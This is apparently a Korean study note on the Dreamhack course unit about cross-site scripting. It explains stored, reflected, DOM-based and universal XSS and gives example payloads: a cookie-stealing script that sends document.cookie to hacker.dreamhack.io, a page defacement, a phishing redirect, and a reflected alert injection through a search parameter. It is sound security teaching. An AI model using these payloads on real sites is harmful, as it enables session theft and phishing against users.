[Dreamhack] ClientSide : XSS

Cross Site Scripting(XSS)

XSS는 공격자가 웹 리소스에 악성 스크립트를 삽입해 클라이언트의 웹 브라우저에서 해당 스크립트를 실행합니다

공격자는 해당 취약점을 통해 특정 계정의 세션이나 쿠키를 탈취하고 해당 계정으로 임의의 기능을 수행할 수 있습니다

 

해당 취약점은 SOP 보안 정책이 등장하면서 서로 다른 오리진에서는 정보를 읽는 행위가 이전에 비해 힘들어졌습니다

하지만 이를 우회하는 다양한 기술들이 소개되면서 XSS 공격은 지속되고 있습니다

 

XSS 발생 예시

• Stored XSS : XSS에 사용되는 악성 스크립트가 서버에 저장되고 서버의 응답에 담겨오는 XSS
• Reflected XSS : XSS에 사용되는 악성 스크립트가 URL에 삽입되고 서버의 응답에 담겨오는 XSS
• DOM-based XSS : XSS에 사용되는 악성 스크립트가 URL Fragment에 삽입되는 XSS
• Universal XSS : 클라이언트의 브라우저 혹은 플러그인에서 발생하는 SOP 정책을 우회하는 XSS

DOM-based XSS 는 Fragment는 서버 Request/Response 에 포함되지 않는걸 활용한 공격입니다

 

XSS 스크립트의 예시

 

쿠키 및 세션 탈취 공격

<script>
// "hello" 문자열 alert 실행.
alert("hello");
// 현재 페이지의 쿠키(return type: string)
document.cookie; 
// 현재 페이지의 쿠키를 인자로 가진 alert 실행.
alert(document.cookie);
// 쿠키 생성(key: name, value: test)
document.cookie = "name=test;";
// new Image() 는 이미지를 생성하는 함수이며, src는 이미지의 주소를 지정. 공격자 주소는 http://hacker.dreamhack.io
// "http://hacker.dreamhack.io/?cookie=현재페이지의쿠키" 주소를 요청하기 때문에 공격자 주소로 현재 페이지의 쿠키 요청함
new Image().src = "http://hacker.dreamhack.io/?cookie=" + document.cookie;
</script>

페이지 변조 공격 

<script>
// 이용자의 페이지 정보에 접근.
document;
// 이용자의 페이지에 데이터를 삽입.
document.write("Hacked By DreamHack !");
</script>

위치 이동 공격

<script>
// 이용자의 위치를 변경.
// 피싱 공격 등으로 사용됨.
location.href = "http://hacker.dreamhack.io/phishing"; 
// 새 창 열기
window.open("http://hacker.dreamhack.io/")
</script>

 

 

Stored XSS

Stored XSS는 데이터베이스 또는 파일 등의 형태로 저장된 악성 스크립트를 조회할때 발생합니다

대표적으로 게시물과 댓글에 악성 스크립트를 포함해 업로드하는 방식이 있습니다

예시로 위와같이 바디에 Script를 삽입하고 실행하면

위와같이 script가 실행되는걸 볼 수 있습니다

 

Reflected XSS

Reflected XSS는 서버가 악성 스크립트가 담긴 요청을 출력할 때 발생합니다

대표적으로 게시판 서비스에서 작성된 게시물을 조회하기 위해 검색창에서 스크립트를 포함해 검색하는 방법이 있습니다

?search= 옆에 정상적인 경로가 아닌 <script>alert(1);</script>를 삽입해 실행한 모습

 

Reflected XSS는 Stored XSS와 다르게 URL과 같은 이용자의 요청에 의해 발생합니다

따라서 공격을 위해 타 이용자에게 악성 스크립트가 포함된 링크에 접속을 유도해야 합니다

그런데 링크를 직접 전달하는것은 스크립트 포함여부가 확인이 가능하기 때문에 Click Jacking 또는 Open Redirect 등 다른 취약점과 연계해 사용합니다